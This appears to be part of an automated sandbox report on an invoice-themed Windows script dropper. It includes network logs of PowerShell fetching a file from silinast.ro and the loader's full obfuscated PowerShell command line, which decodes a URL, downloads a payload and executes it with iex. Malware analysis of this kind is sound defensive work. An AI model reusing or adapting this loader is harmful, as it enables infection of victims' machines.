              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              113192.168.2.662426188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:05:41.545600891 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              114192.168.2.662427188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:05:45.747153044 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              115192.168.2.662428188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:05:45.763678074 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              116192.168.2.662429188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:05:49.801388025 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              117192.168.2.662430188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:05:49.814071894 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              118192.168.2.662437188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:05:53.831067085 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              119192.168.2.662438188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:05:53.844997883 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              General

              Target ID:0
              Start time:05:01:47
              Start date:08/10/2024
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Wniosek o numer faktury.wsf"
              Imagebase:0x7ff76ea80000
              File size:170'496 bytes
              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:2
              Start time:05:01:47
              Start date:08/10/2024
              Path:C:\Windows\System32\cmd.exe
              Wow64 process (32bit):false
              Commandline:cmd.exe /c ping 6777.6777.6777.677e
              Imagebase:0x7ff633ff0000
              File size:289'792 bytes
              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:3
              Start time:05:01:47
              Start date:08/10/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff66e660000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:4
              Start time:05:01:47
              Start date:08/10/2024
              Path:C:\Windows\System32\PING.EXE
              Wow64 process (32bit):false
              Commandline:ping 6777.6777.6777.677e
              Imagebase:0x7ff785860000
              File size:22'528 bytes
              MD5 hash:2F46799D79D22AC72C241EC0322B011D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:moderate
              Has exited:true

              General

              Target ID:5
              Start time:05:01:48
              Start date:08/10/2024
              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Semicellulous Sasia Afblsningers fortification Ungarbejderens #>;$Jestenenes='sollegeme';<#Perspiration Widish Redobles Foresprgerens Snobbisme #>;$Bromatologiens=$Lorelei128+$host.'PrivateData';If ($Bromatologiens) {$Boutonnieres++;}function Citationstegnet($Praepuce){$Firewarden117=$udnyttedes+$Praepuce.Length-$Boutonnieres; for( $Udfladningerne1=7;$Udfladningerne1 -lt $Firewarden117;$Udfladningerne1+=8){$Beritt='Affaldsbortskaffelsesomraaderne';$fumitories+=$Praepuce[$Udfladningerne1];$Exsectile='Impieties';}$fumitories;}function Humiria($Skdefrakkernes){ . ($Kaste) ($Skdefrakkernes);}$Udfladningerne1vyberry=Citationstegnet 'ChienfoMWingle o FrkapszSkyttesiNonshatl Vab erlNonch maKrydr s/ Cons q5 Coni i. Ophiur0Udebliv modpart(MilepleWSti lehiTak artnReirrigdUfrihedojubilizw angforsAtletis NedslagNBedrageT Defade Kuponen1Teredos0,budent.Cybercu0Matinmx;Maskinm GrskkatW UdspiniBoiler nLongw y6Mayos,v4 Anthro;S eavep Tras.expar tid6Tabanu 4Frifind;Hushold lseligrRke ispvabashle: N napp1 Pererr2 efleks1 Neutra.Recons 0H lvled) Compos esuetuG Bortf eO.gngelcSoricidkVolcanooZonesys/Glosser2Forvold0Turloug1Melleml0 nie,zs0G,lvano1F lthro0 Ristni1Landbru Lommer,FSkalkesi Sel,plrTorskeneHydrofofKonditoosiderocx kledis/Hjemt,g1 Ca,lal2 Tikkes1Nor ann.Ind atn0Ordrere ';$Aprilsnars190=Citationstegnet 'PropounUDyb rysS KongebE lozengrin issu-A,kelleaKoncis gBusfor eViewyyaN HercogTLrerudd ';$Maalestationernes=Citationstegnet 'RbdigsthPhilomatArseniutKaolinapVrdido :.wfulle/.rocaic/PuppetlsJacalsii F,rulylHepht eiMaaleren epersoau,creatsLicentitConnuan.KontrrernontyphoPondero/ UnguicJ,ongfeluDyrtidsgAfgrelslThro,doa niformn charondPrefectiTv,ngsinEksdik..Kin.redxType odtkristanpInd ull ';$Terroristens=Citationstegnet 'eft rml>Deseca ';$Kaste=Citationstegnet 'U derviicephaloeLaiciziX Perfor ';$Halibuts='Layland';$Darlenes='\Kassestrimmelens.Aft';Humiria (Citationstegnet 'Heft,gt$SkridtbGCrotonil KrystaOAbstracBpurdasiAUdsor el N,nges:Udsag kA .anthodRefas,emUncharii SuppleNPostsaci ewspapsGenvlgetD,ekcyaRNonunciA Hulds T IlliciiKvittero MorfinNEpilogisPreentepDrun,enrCus ekdOTvetandGtrkgardrLitera ABeijingM ic.orsmAlarmereSthammerInd fry=Undersk$Sur,useeSeweragNMllerenVTa kats:UndightACentralpdristerPF cellid StorstAEgomanit Sku spAMe,meri+ Pander$LinguovDKlvandkaBelliferGinglymLCumsha,EAlmennyN VarmlueBrugsmsSAnorect ');Humiria (Citationstegnet 'Viziera$AdemonigPr teifLArbejdeoVan fribMixologaAfkodnilUnderme:RegnefuUaksiomaPIncongeS Fo beheScorevatHypos rTEncr,ptaKonversl Opmarc=Economb$TrimolemOpstaada VegetaaUvrdigtlEnsurege Vo dgiS EngberT redsaAImp,ritT ArvelsiPekingeO Inthron andsynEDemoniaRAffaldsNSympatiEOverlegsFastlaa.H.vregrSSandslopBestriplMisogynimycelietoverjoy(Hagge,e$ Af,tantUnarcheeSilikatrB sgader,hasiluoFremholRDgn.rveIMiscoloS.pildolTPo letreIsocampN SubsidsBlodser)Strepto ');Humiria (Citationstegnet 'Contral[ SandblnYawl nkEXiphipltAartier. ,erpenS Fla.gieVictorir StatsvvPo ygeniS philiCBlaffe eModulvip ensdyrO bil igiBlokadeNCholecyTLovprisMHjhletfAFibroelNN edlemaLongbowgHv,skedEJamborerTrktjet]philomu:Elforsy:b,ckbussBraiserEGlyconeCSkeletouSingul.RNationaIjedd,hitCommin.yHu tankpSwoosheRHydro,lo TidtagtNonshatOfr dmmeC Jor,broHaleweelUdsprin Boldtre=Pteropu Strejf[Ve.nacuNMizenmaeTranquiT Anostr.Rationas D.shalE nowbloCFlus erUFluktueRUsheriaITekstilTEpi idyyShedmanPJydepotr But,ksOH.lotriTAg rnsuOLivskracSpilledois andsLGenetabTUntwitcYcrestsrPHoodshyELredren] gldssa:homemak:Form ddT Bra,etLMellemfs Abdomi1Uncoaxe2 Superf ');$Maalestationernes=$Upsettal[0];$eupnoeic=(Citationstegnet 'Po tula$ Spermag ,alataLSlvstolOIntell.b W,nderaChefk nLWrangle:VildtdidFluviale demi aAPotholer VedersYFluor s2 Lovreg3Sprogkl3Rayonna=undervinslambeheNectriaW Subung- PeroliO WoolieBLgnehisJGarapateUna brec uggenttT ermot HymenopsOppo itY A.minisS.rivelt eemanaEDe ennimPatriar.War letnTabelleErivettitF,rstan.Listep WVinderteOverstiBDri,tsiC SponsoLColaensI S.cialE Rec ifNafvikliTUdydsva ');Humiria ($eupnoeic);Humiria (Citationstegnet 'Gulliut$u graveDMidshipe ste peaSourtoprs,pramayLeverin2Dehydra3Adjuvat3 Sa men.Gr ynesHRichn.seSejpinea,ranchedSubmerge Rets.rrSekundasGopural[Slyng i$andenklAHypapoppDagsprirAa enhjiCounterlSafthols lapsenter,itoaRtehalmrbagefors pardie1Gungrem9Fe mate0Sl bnin]p.theca= Stepd.$Guas.alUPalewi d Abb.evf SelvhelSacrifia.pectrudTele henSpectroiHom,nymnSappa wgHurriexeAntimonrPoachernseasonaeOverr s1Perspekv harteryBlo rigb Retroce Foliarr TambalrDelkredyBilledf ');$Venskabsbyen=Citationstegnet 'Un.erkb$ .hylloD Morbi eShrewisa Fortolr eitonoy nderpa2Fructuo3 Marche3Ectopla. RosewoDEksilero Ngleomw Nonradn CountelFabrikaoOveroffaSulphiddIrmamrkF anensciDr ntfolFredrikebogklub(Sammens$LarrikiMDosmerna Sundh,aVan.lbslSanselie Sele.tsDobbelttVigint avagrantt H.rejuiConvivioInddmconUnmembee Ma dskr blytkkn Popul.eValewarsHo.shan,Trykblg$EfterviRBararmeuSkaf,esbForfl,di DemonoaDemountc FuturoeblndramaChronise Rednin) Egensk ';$Rubiaceae=$administrationsprogrammer;Humiria (Citationstegnet 'Ev ngel$ Ta,ellgSnitselLDiscandoEkstre.BStin svaSplenolLMedh.lp:P oletaoShahe,sFKipkalvfPolygamICensurkCotiticei ServieaUnderudlKbslaaaVMunsifciOverlubR LeachekSubsistsMesonepOBla dinMSubramohE.aarigEFuglehaDBronchoE Eksperr Social4 Roligt4 Overtr=Horaten(Kat,batTFoxtrotE QuisquS NominatD sbenc-VarselsP BetingA Fore.dtComitatHParthen egelis$TrstubbRSpeedomuSelenosBDesig.fiRedemptA Appetic Trans eGodsterAPillorieVejenkl)Kvgbrug ');while (!$Officialvirksomheder44) {Humiria (Citationstegnet ' Opretn$Expand.gBoozinelK ivkamoMinim.rbOtocystapleasaulAdviser:Mo omolC UdgiftoGobblinlSkibsr,lDioicouy evggrub pleopoadigono =Tilsp.r$Pyoi betcofi.anr Kategou antiscePhospho ') ;Humiria $Venskabsbyen;Humiria (Citationstegnet 'S,lowviSChristiTTransisaRehoninr,valiteTFintede-Unikae s,latycnLVert biE,acrameeQuinovopClinoph Domajig4Calatra ');Humiria (Citationstegnet ' Bilbre$ atsdekgAegteskl SlagteOSocio oBS,lerodAVulgariLWorkbas:snowshaO ndiscFCatchplf Str foI Kryst cDicotylIModarb aDenouncLheraldrvSacketcI S outerAnticorkLag rbeSTeasellOLmmelstmPre,onshcircumseUn ulatdpolemoseSu ernirIndlagt4Tonnens4Beruser=Synsv d(ZarerviTBesl tnESmilerhSunst inT skrift-Falshvlp sldrevaHengivetBlokbebh Isohes Raekker$Mu ticyrOverv,ruT,lentfb aniskeiSedimenAFodl ngcBino,iaEOverrelasavoroueKri.sra)Non pos ') ;Humiria (Citationstegnet 'Indremi$BitestiG InspirLTumidito TrbeskbGenyantaF rbrydLBerring:Bet gensPenta eCIvrkstthEksportO onsillo utpresLMark nghHyperviOUninterUDe,ainaskancelleKlag adSCiril o=D meskr$ nruddgUn,ordyLMudde,pOGottharBHospitaAInkorpoL Deta h:underdeo a ribrrUnappreihustankSSstridspRagoutehHaartopEEntreprRUn.ougheRepelli+Ceylone+Fednmag%Ydmyg.d$DiapnotULov stePUn selisSammensEcum,noiTFluidist TroposAAl,mnollMouseba. T lhoec IndsyoO SlidsoUTrivia NSpacecrTindvend ') ;$Maalestationernes=$Upsettal[$schoolhouses];}$Effektfuld=311542;$Garnnglers=33970;Humiria (Citationstegnet 'Flad.ng$ almebgGUdkoblelPintaskO BrobygBOpvejeraUncon.ilU level:Fa ulteETndrrsnm Sabba bUdenrigRkyllin OEndocriSMagi.trc VidereOHombretPweed inI SurfedCPa ynol Folk re= En.old FasanhnGThal aneNy ansktVelkoms-SkenderCInrusheo jertesN KontorTButi keeNo ditanChungviTOmstnin Udrug $TestamerTonikaeUBackarrBSkribleiKlemat aUbekrftCRandomiECoinquiaA ylemiePerspek ');Humiria (Citationstegnet '.mmodyt$RealitegBlackgulheteroco Rkvrkeb BropenaStngelelNucleat:tapaderSSocialleOlfactymSej brtiUnhonesnRubbereiashilymsYalelaatR books2Clodpol4cantr p3racehes Dogmat=Pilpais Dagafsn[CurricuSRubblinyCranke swired,atNonlique forgivmunridab.ExquisiCC shkluo BalletnSynta svAnegalle oupetfrBrisjabtReh efo]Life,ty: Andrag:UnsearcFAgurksprDueske o Ci clemSquamygBGipsdepaEuropaksO fwhiteS,upnef6Kimissv4indkbsaS nplankt proaccrSagnfigiNic namnCel ermgTim lia(Inexora$panningEPa elunmP stinsbDronninrFortidsoGraphics Percenc Soci loPreindupKur,udviMyndighcGossame)Forvist ');Humiria (Citationstegnet 'Foldout$SparepegAlkylolLSenilisoBippeneBDumpnina LaparoLSide il:LangvarL usstano Pe minO Adoni.KLeukoseDSkrte uoSjlevanWIlfrdignGamblessUntissu Harpun =Wickyfo Debyein[ Re nfrsKlagdocyKommuneS DesserT angsveeEquilinmP ulina.RugbyenTPapirdoe BrugerXTilrettt S yros.Begyn.eePredissnTachomeC onstorORodetcodDipoleri MdeaftnRungendgAchokes] Jordvo:uvurder: Nonat ABill.dhsDiluviuCHyponomiTomasteIOreocar.genforeGPeritoneEbelt,ftTrehedesVenligstVi tigtR BanabaILisabetNtehuecoGNonstat(omstill$ AntigeS DuridiEVertikaMHageskgIPropinqn O helcIIskagemS Hexad tUn slaa2 okalp4Forthse3u adjus)Looking ');Humiria (Citationstegnet 'Phototy$CatchphG VidtlfLMeddelso TintinbDacapona BefrieLKanjist:TmrermeNFrangibO BettonN askinfCHygiejna SlabbenNonreseDReallnnIHjssoneDRekapitaStude rT tearinEUdgivelSForhand=Knnessk$ EkkololPostninO anim loFibrillKCepforsdElianasO destitWComminuNhobbyi S Inju i.FlakonesEkstr.oUApothecbDevalueSPara idTNicolaiRDr,vtmmiUdligniNDivertiGRecoils( hasian$Ni htimE,yromanf ammenkfToraerseMyer,orK BenzintRefuserf artoonuHorsecrLRitteniD Obispo,Udenla $ HyrekrgGedesk,ADaaredertankangnDanielun PejoraG SkatteLSwe.tieeHyaluror RdkaalS ortari)Unhaggl ');Humiria $Noncandidates;"
              Imagebase:0x7ff6e3d50000
              File size:452'608 bytes
              MD5 hash:04029E121A0CFA5991749937DD22A1D9
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:false

              General

              Target ID:6
              Start time:05:01:48
              Start date:08/10/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff66e660000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:false

              Disassembly

              Reset < >

                Executed Functions

                Function 00007FFD347C47E0 Relevance: .3, Instructions: 331COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4648426659.00007FFD347C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd347c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5e5c9d951e9318dbbe6de791989fcbd5a4999d704c91048c323946ee8157f524
                • Instruction ID: b055c3ec0e5fe6ba34aa67112d8c4b30c14477fff99548ff77f81228a931c27f
                • Opcode Fuzzy Hash: 5e5c9d951e9318dbbe6de791989fcbd5a4999d704c91048c323946ee8157f524
                • Instruction Fuzzy Hash: E69128A2B0DA9A6FE7A8D61C58B61B577D1EF97210B08017FD54EC3193ED1DBC019281
                Function 00007FFD347C4A9B Relevance: .2, Instructions: 156COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4648426659.00007FFD347C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd347c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c82caeda069ce4198f9bd3adafbaf8b0b87eade8a55db25380d8e259a5be143e
                • Instruction ID: 2274b3afa9c3f18f4fbc7d6c27064f2d64636739b835f9ff16403374682f4377
                • Opcode Fuzzy Hash: c82caeda069ce4198f9bd3adafbaf8b0b87eade8a55db25380d8e259a5be143e
                • Instruction Fuzzy Hash: D151BE62A4E7C55FE3579B781CB92643FE09F53260B0A01FBD189CB1A3D95D2C498322
                Function 00007FFD347C4924 Relevance: .1, Instructions: 99COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4648426659.00007FFD347C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd347c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 95ebdf632aabe52547b2785172cf3cfc4f533256235362a275492038c15e397f
                • Instruction ID: 3c63cd20791b08c8fff47beec300d9931d983d3e0f94125cd4ced8271dbddcb4
                • Opcode Fuzzy Hash: 95ebdf632aabe52547b2785172cf3cfc4f533256235362a275492038c15e397f
                • Instruction Fuzzy Hash: F621F5A2F1EAA69FE3A5E62C15B117476C2EF97210B5801BAD14EC7193ED1DBC01A281
                Function 00007FFD347C1A7F Relevance: .1, Instructions: 82COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4648426659.00007FFD347C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd347c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e7049178623527e4db3a7640e0e2d805e16826be3552fcd9e610eb01898c329c
                • Instruction ID: 439f1d69ee044e70c0fd5ee8733af7637e2a55883ccf36c478dd939ed58958ee
                • Opcode Fuzzy Hash: e7049178623527e4db3a7640e0e2d805e16826be3552fcd9e610eb01898c329c
                • Instruction Fuzzy Hash: FE21F193E0FAC15FE361A62818A90686BD1DF5B650B1842FFD098CB1D3E81D6C49D791
                Function 00007FFD347C744E Relevance: .1, Instructions: 56COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4648426659.00007FFD347C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd347c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9407161183f685dc482ca4688ebe5875e6b93ebcb63f9467e3522e575539d01e
                • Instruction ID: 157250b7c17c8b4d3ce8c36db79b83cac106a5643a9b8dbfa0ebdd8e3eb0cb79
                • Opcode Fuzzy Hash: 9407161183f685dc482ca4688ebe5875e6b93ebcb63f9467e3522e575539d01e
                • Instruction Fuzzy Hash: BF1106B2B0D68A4FEB56DB9850A45A87F91EF5A310B1800BFC54CCB193DE2DAC01C391
                Function 00007FFD346F41E5 Relevance: .0, Instructions: 49COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4648117684.00007FFD346F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346F0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd346f0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
                • Instruction ID: 0f131bc7d0dfd6da857fcd5c5c282894d299e86555c8ae9e83c7e0300eede7c4
                • Opcode Fuzzy Hash: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
                • Instruction Fuzzy Hash: E501677121CB0C4FD744EF4CE451AB5B7E0FB95364F10056DE58AC3655D636E882CB45

                Non-executed Functions

                Function 00007FFD347C5DFE Relevance: .4, Instructions: 407COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4648426659.00007FFD347C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd347c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 228bec2a95f0131ce54d802805a5b3096766ef1d25d2b85970a0dd80a2d3c159
                • Instruction ID: 910ee9b38f2f340524c2aac2df2bd7b34cda2c79aea4bdea4674fc7f6c0eefa7
                • Opcode Fuzzy Hash: 228bec2a95f0131ce54d802805a5b3096766ef1d25d2b85970a0dd80a2d3c159
                • Instruction Fuzzy Hash: 57C129A2A0E7C55FE7A3877858A55A53FE1DF53220B0901FBC188CB0A3D90D6C4AD392
                Function 00007FFD346F4C28 Relevance: .3, Instructions: 285COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4648117684.00007FFD346F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346F0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd346f0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b22a055bb5c296525de96a38127824435c0ab9ef7a20b1f1459e964a2c3f9936
                • Instruction ID: b53dfdffbe637b54e344ba29a66d881e0644f32c0505d936c94db20bbec07be4
                • Opcode Fuzzy Hash: b22a055bb5c296525de96a38127824435c0ab9ef7a20b1f1459e964a2c3f9936
                • Instruction Fuzzy Hash: 1C917397B0E6D32FF3635A2C18B61E97F90EF63264B0911B7C5D4C7493AE0D6807A252